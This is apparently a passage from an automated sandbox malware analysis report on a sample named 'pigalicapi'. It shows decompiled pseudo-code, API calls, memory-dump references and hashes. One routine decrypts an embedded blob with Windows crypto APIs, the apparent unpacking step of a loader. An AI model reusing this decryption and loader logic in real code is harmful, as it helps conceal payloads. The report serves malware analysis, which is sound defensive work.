                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61F01C76A045158BCB10BF6698840BDF7F1FE44314B454C7EE996A3350D738A426CBD6
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E8090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				long _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                                                                                                                                                        				int _v48;
                                                                                                                                                                                                                                                                                                        				long _v52;
                                                                                                                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t73;
                                                                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_v16 = _a8;
                                                                                                                                                                                                                                                                                                        					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t71;
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_t73 = E024E1390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                                                        						_v20 = _t73;
                                                                                                                                                                                                                                                                                                        						if(_v20 != 0) {
                                                                                                                                                                                                                                                                                                        							_v24 = _v12;
                                                                                                                                                                                                                                                                                                        							_v28 = _v20;
                                                                                                                                                                                                                                                                                                        							_v32 = E024E87B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                                                        								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                                                        								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                                                        								_v36 = E024E16F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                                                        								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                                                        									E024E8630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                                                        									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                                                        									E024E8630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                                                        									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                                                        									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                                        									_t91 = E024E8A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x24f3410, 0x254); // executed
                                                                                                                                                                                                                                                                                                        									if(_t91 != 0) {
                                                                                                                                                                                                                                                                                                        										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        										 *_a12 = _t93;
                                                                                                                                                                                                                                                                                                        										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                                                        											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                                                        											E024E7B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                                                        											 *_a16 = _v52;
                                                                                                                                                                                                                                                                                                        											_v8 = _v52;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_v8 == 0) {
                                                                                                                                                                                                                                                                                                        							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}



















                                                                                                                                                                                                                                                                                                        0x024e8096
                                                                                                                                                                                                                                                                                                        0x024e80a1
                                                                                                                                                                                                                                                                                                        0x024e8246
                                                                                                                                                                                                                                                                                                        0x024e824c
                                                                                                                                                                                                                                                                                                        0x024e80c5
                                                                                                                                                                                                                                                                                                        0x024e80c8
                                                                                                                                                                                                                                                                                                        0x024e80d8
                                                                                                                                                                                                                                                                                                        0x024e80de
                                                                                                                                                                                                                                                                                                        0x024e80e5
                                                                                                                                                                                                                                                                                                        0x024e80fb
                                                                                                                                                                                                                                                                                                        0x024e8103
                                                                                                                                                                                                                                                                                                        0x024e810a
                                                                                                                                                                                                                                                                                                        0x024e8113
                                                                                                                                                                                                                                                                                                        0x024e8119
                                                                                                                                                                                                                                                                                                        0x024e812d
                                                                                                                                                                                                                                                                                                        0x024e8134
                                                                                                                                                                                                                                                                                                        0x024e8140
                                                                                                                                                                                                                                                                                                        0x024e8149
                                                                                                                                                                                                                                                                                                        0x024e8162
                                                                                                                                                                                                                                                                                                        0x024e816b
                                                                                                                                                                                                                                                                                                        0x024e817e
                                                                                                                                                                                                                                                                                                        0x024e818c
                                                                                                                                                                                                                                                                                                        0x024e819e
                                                                                                                                                                                                                                                                                                        0x024e81b1
                                                                                                                                                                                                                                                                                                        0x024e81d3
                                                                                                                                                                                                                                                                                                        0x024e81d8
                                                                                                                                                                                                                                                                                                        0x024e81e2
                                                                                                                                                                                                                                                                                                        0x024e81f1
                                                                                                                                                                                                                                                                                                        0x024e81fa
                                                                                                                                                                                                                                                                                                        0x024e8202
                                                                                                                                                                                                                                                                                                        0x024e820e
                                                                                                                                                                                                                                                                                                        0x024e8219
                                                                                                                                                                                                                                                                                                        0x024e8227
                                                                                                                                                                                                                                                                                                        0x024e822c
                                                                                                                                                                                                                                                                                                        0x024e822c
                                                                                                                                                                                                                                                                                                        0x024e8202
                                                                                                                                                                                                                                                                                                        0x024e81e2
                                                                                                                                                                                                                                                                                                        0x024e816b
                                                                                                                                                                                                                                                                                                        0x024e8134
                                                                                                                                                                                                                                                                                                        0x024e8233
                                                                                                                                                                                                                                                                                                        0x024e8240
                                                                                                                                                                                                                                                                                                        0x024e8240
                                                                                                                                                                                                                                                                                                        0x024e8233
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e80e5

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E80D8
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E8240
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: GetLastError.KERNEL32 ref: 024E8ADD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 024E81F1
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 142027497-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8e7467fdcd52b0c20d4b4b6b13b7570243d339d6de203c1948f081693ef88157
                                                                                                                                                                                                                                                                                                        • Instruction ID: de3c2269aa04ffa70ca72aaa96b8a21e166da246dcfaf0223529a2dd2c24304a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e7467fdcd52b0c20d4b4b6b13b7570243d339d6de203c1948f081693ef88157
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E05107B4E00209AFEF14DF98D984BAEB7B6BF48305F148559E905BB391D730AA40CF65
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                                        			E024E5930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                                                                                                        				void _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				signed int _v60;
                                                                                                                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
                                                                                                                                                                                                                                                                                                        					E024E7B70( &_v24, _a4, 0x10);
                                                                                                                                                                                                                                                                                                        					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
                                                                                                                                                                                                                                                                                                        					asm("movsw");
                                                                                                                                                                                                                                                                                                        					asm("movsb");
                                                                                                                                                                                                                                                                                                        					_v56 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v56 < _a12) {
                                                                                                                                                                                                                                                                                                        						_v60 = (( *(_t70 + _v56 - 0x14) & 0x000000ff) + _v56 + 1) * (_v56 + 2) % 0x1a;
                                                                                                                                                                                                                                                                                                        						_a8[_v56] =  *((intOrPtr*)(_t70 + _v60 - 0x30));
                                                                                                                                                                                                                                                                                                        						if(_v56 == 0) {
                                                                                                                                                                                                                                                                                                        							CharUpperA(_a8); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        						_v56 = _v56 + 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x024e5938
                                                                                                                                                                                                                                                                                                        0x024e5943
                                                                                                                                                                                                                                                                                                        0x024e5971
                                                                                                                                                                                                                                                                                                        0x024e5986
                                                                                                                                                                                                                                                                                                        0x024e5988
                                                                                                                                                                                                                                                                                                        0x024e598a
                                                                                                                                                                                                                                                                                                        0x024e598b
                                                                                                                                                                                                                                                                                                        0x024e599d
                                                                                                                                                                                                                                                                                                        0x024e59c6
                                                                                                                                                                                                                                                                                                        0x024e59d6
                                                                                                                                                                                                                                                                                                        0x024e59dc
                                                                                                                                                                                                                                                                                                        0x024e59e2
                                                                                                                                                                                                                                                                                                        0x024e59e2
                                                                                                                                                                                                                                                                                                        0x024e59ee
                                                                                                                                                                                                                                                                                                        0x024e599a
                                                                                                                                                                                                                                                                                                        0x024e599a
                                                                                                                                                                                                                                                                                                        0x024e599d
                                                                                                                                                                                                                                                                                                        0x024e59fb

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharUpperA.USER32(00000000), ref: 024E59E2
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 024E597E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CharUpper
                                                                                                                                                                                                                                                                                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                                        • API String ID: 9403516-1277644989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 24502c0283990be21275f7b0f836cd1736cae4d3f55588038331482453d93402
                                                                                                                                                                                                                                                                                                        • Instruction ID: e7b6931e84fb40c79b7092a6a5e557efa7aa3973db162a046480f4f1f802c9ba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 24502c0283990be21275f7b0f836cd1736cae4d3f55588038331482453d93402
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80214C31902208EBEF04CF98E584BEEBBB6FF9531AF24855AF80567340D3759A45CB50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: memsetrealloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3488966140-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
                                                                                                                                                                                                                                                                                                        • Instruction ID: dad7b14d47605fe78516e20dfcd52e82a159e52376bfce22ed144a28b74165c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73e63d71c0d50dbc6898d8e05f666f7501ca3559874ea9105649bcf31ce7fe83
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D15CB0704305EFD720EF15E68079ABBF0AB84344F90882EE6858B361D7B99485CB5E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                                        			E0040D0C0(void* __ebx, signed int __edi, signed int __esi) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				void* _v61;
                                                                                                                                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                                                                                                                                        				char* _v80;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                                                                                                                                                        				signed int _v88;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                                                                                                                        				long _t76;
                                                                                                                                                                                                                                                                                                        				signed int _t80;
                                                                                                                                                                                                                                                                                                        				void* _t81;
                                                                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                                                                        				signed char* _t87;
                                                                                                                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t94;
                                                                                                                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                                                                                                                                                        				signed short _t101;
                                                                                                                                                                                                                                                                                                        				signed char _t106;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t114;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t121;
                                                                                                                                                                                                                                                                                                        				signed int _t122;
                                                                                                                                                                                                                                                                                                        				signed int _t126;
                                                                                                                                                                                                                                                                                                        				int _t135;
                                                                                                                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                                                                                                                        				char** _t147;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t130 = __esi;
                                                                                                                                                                                                                                                                                                        				_t119 = __edi;
                                                                                                                                                                                                                                                                                                        				_t61 =  *0x42206c; // 0x1
                                                                                                                                                                                                                                                                                                        				if(_t61 == 0) {
                                                                                                                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                                                                                                                        					_push(__esi);
                                                                                                                                                                                                                                                                                                        					 *0x42206c = 1;
                                                                                                                                                                                                                                                                                                        					_t66 = E0040DB20(0x0000001e + (E0040D950() + _t62 * 0x00000002) * 0x00000004 & 0xfffffff0, __ebx);
                                                                                                                                                                                                                                                                                                        					 *0x422070 = 0;
                                                                                                                                                                                                                                                                                                        					_t147 = _t145 - 0x4c - _t66;
                                                                                                                                                                                                                                                                                                        					 *0x422074 =  &_v61 & 0xfffffff0;
                                                                                                                                                                                                                                                                                                        					_t70 = 0x18;
                                                                                                                                                                                                                                                                                                        					__eflags = 0x4219b4 - 7;
                                                                                                                                                                                                                                                                                                        					if(0x4219b4 <= 7) {
                                                                                                                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                                                                                                                        						return _t70;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						__eflags = 0x4219b4 - 0xb;
                                                                                                                                                                                                                                                                                                        						if(0x4219b4 <= 0xb) {
                                                                                                                                                                                                                                                                                                        							_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        							goto L26;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t70 =  *0x42199c; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t70;
                                                                                                                                                                                                                                                                                                        							if(_t70 != 0) {
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t70 =  *0x4219a0; // 0x0
                                                                                                                                                                                                                                                                                                        								__eflags = _t70;
                                                                                                                                                                                                                                                                                                        								if(_t70 != 0) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t119 =  *0x4219a4; // 0x1
                                                                                                                                                                                                                                                                                                        									_t93 = 0x4219a8;
                                                                                                                                                                                                                                                                                                        									__eflags = _t119;
                                                                                                                                                                                                                                                                                                        									if(_t119 == 0) {
                                                                                                                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                                                                                                                        										_t130 =  *_t93;
                                                                                                                                                                                                                                                                                                        										__eflags =  *_t93;
                                                                                                                                                                                                                                                                                                        										if( *_t93 != 0) {
                                                                                                                                                                                                                                                                                                        											L16:
                                                                                                                                                                                                                                                                                                        											__eflags = _t93 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        											if(_t93 >= 0x4219b4) {
                                                                                                                                                                                                                                                                                                        												goto L14;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                                                                                                        													_t17 = _t93 + 4; // 0x0
                                                                                                                                                                                                                                                                                                        													_t110 =  *_t17;
                                                                                                                                                                                                                                                                                                        													_t93 = _t93 + 8;
                                                                                                                                                                                                                                                                                                        													_t18 = _t110 + 0x400000; // 0x400000
                                                                                                                                                                                                                                                                                                        													_t19 = _t110 + 0x400000; // 0x905a4d
                                                                                                                                                                                                                                                                                                        													_t20 = _t93 - 8; // 0x4e472820
                                                                                                                                                                                                                                                                                                        													_v56 =  *_t19 +  *_t20;
                                                                                                                                                                                                                                                                                                        													E0040CE80(_t18, _t93, 4, _v64, _t119, _t130);
                                                                                                                                                                                                                                                                                                        													__eflags = _t93 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        												} while (_t93 < 0x4219b4);
                                                                                                                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t38 = _t93 + 4; // 0x0
                                                                                                                                                                                                                                                                                                        											_t95 =  *_t38;
                                                                                                                                                                                                                                                                                                        											__eflags =  *_t38;
                                                                                                                                                                                                                                                                                                        											if( *_t38 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L8;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        										L8:
                                                                                                                                                                                                                                                                                                        										_t6 = _t93 + 8; // 0x1
                                                                                                                                                                                                                                                                                                        										_t80 =  *_t6;
                                                                                                                                                                                                                                                                                                        										__eflags = _t80 - 1;
                                                                                                                                                                                                                                                                                                        										if(_t80 != 1) {
                                                                                                                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                                                                                                                        											_v88 = _t80;
                                                                                                                                                                                                                                                                                                        											 *_t147 = "  Unknown pseudo relocation protocol version %d.\n";
                                                                                                                                                                                                                                                                                                        											_t81 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
                                                                                                                                                                                                                                                                                                        											0;
                                                                                                                                                                                                                                                                                                        											0;
                                                                                                                                                                                                                                                                                                        											asm("fninit");
                                                                                                                                                                                                                                                                                                        											return _t81;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t94 = _t93 + 0xc;
                                                                                                                                                                                                                                                                                                        											__eflags = _t94 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        											if(_t94 < 0x4219b4) {
                                                                                                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                                                                                                        													_t114 =  *_t94;
                                                                                                                                                                                                                                                                                                        													_t7 = _t94 + 4; // 0x312e382e
                                                                                                                                                                                                                                                                                                        													_t121 =  *_t7;
                                                                                                                                                                                                                                                                                                        													_t9 = _t121 + 0x400000; // 0x316e382e
                                                                                                                                                                                                                                                                                                        													_t87 = _t9;
                                                                                                                                                                                                                                                                                                        													_v64 =  *((intOrPtr*)(_t114 + 0x400000));
                                                                                                                                                                                                                                                                                                        													_t11 = _t94 + 8; // 0x0
                                                                                                                                                                                                                                                                                                        													_t100 =  *_t11 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        													__eflags = _t100 - 0x10;
                                                                                                                                                                                                                                                                                                        													if(_t100 == 0x10) {
                                                                                                                                                                                                                                                                                                        														_t101 =  *(_t121 + 0x400000) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        														_t122 = _t101 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        														__eflags = _t101;
                                                                                                                                                                                                                                                                                                        														_t123 =  <  ? _t122 | 0xffff0000 : _t122;
                                                                                                                                                                                                                                                                                                        														_t124 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114;
                                                                                                                                                                                                                                                                                                        														_t125 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
                                                                                                                                                                                                                                                                                                        														_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        														_t135 = _v64 + ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
                                                                                                                                                                                                                                                                                                        														__eflags = _t135;
                                                                                                                                                                                                                                                                                                        														_v56 = _t135;
                                                                                                                                                                                                                                                                                                        														E0040CE80(_t87, _t94, 2,  &_v56, ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000, _t135);
                                                                                                                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														__eflags = _t100 - 0x20;
                                                                                                                                                                                                                                                                                                        														if(_t100 == 0x20) {
                                                                                                                                                                                                                                                                                                        															_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        															_t138 = _v64 - _t114 + 0x400000 +  *_t87;
                                                                                                                                                                                                                                                                                                        															_v56 = _v64 - _t114 + 0x400000 +  *_t87;
                                                                                                                                                                                                                                                                                                        															E0040CE80(_t87, _t94, 4,  &_v56, _t121, _v64 - _t114 + 0x400000 +  *_t87); // executed
                                                                                                                                                                                                                                                                                                        															goto L30;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															__eflags = _t100 - 8;
                                                                                                                                                                                                                                                                                                        															if(_t100 == 8) {
                                                                                                                                                                                                                                                                                                        																_t106 =  *_t87 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        																_t126 = _t106 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        																__eflags = _t106;
                                                                                                                                                                                                                                                                                                        																_t127 =  <  ? _t126 | 0xffffff00 : _t126;
                                                                                                                                                                                                                                                                                                        																_t128 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000;
                                                                                                                                                                                                                                                                                                        																_t129 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																_t138 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        																_v56 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																E0040CE80(_t87, _t94, 1,  &_v56, ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114, _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114);
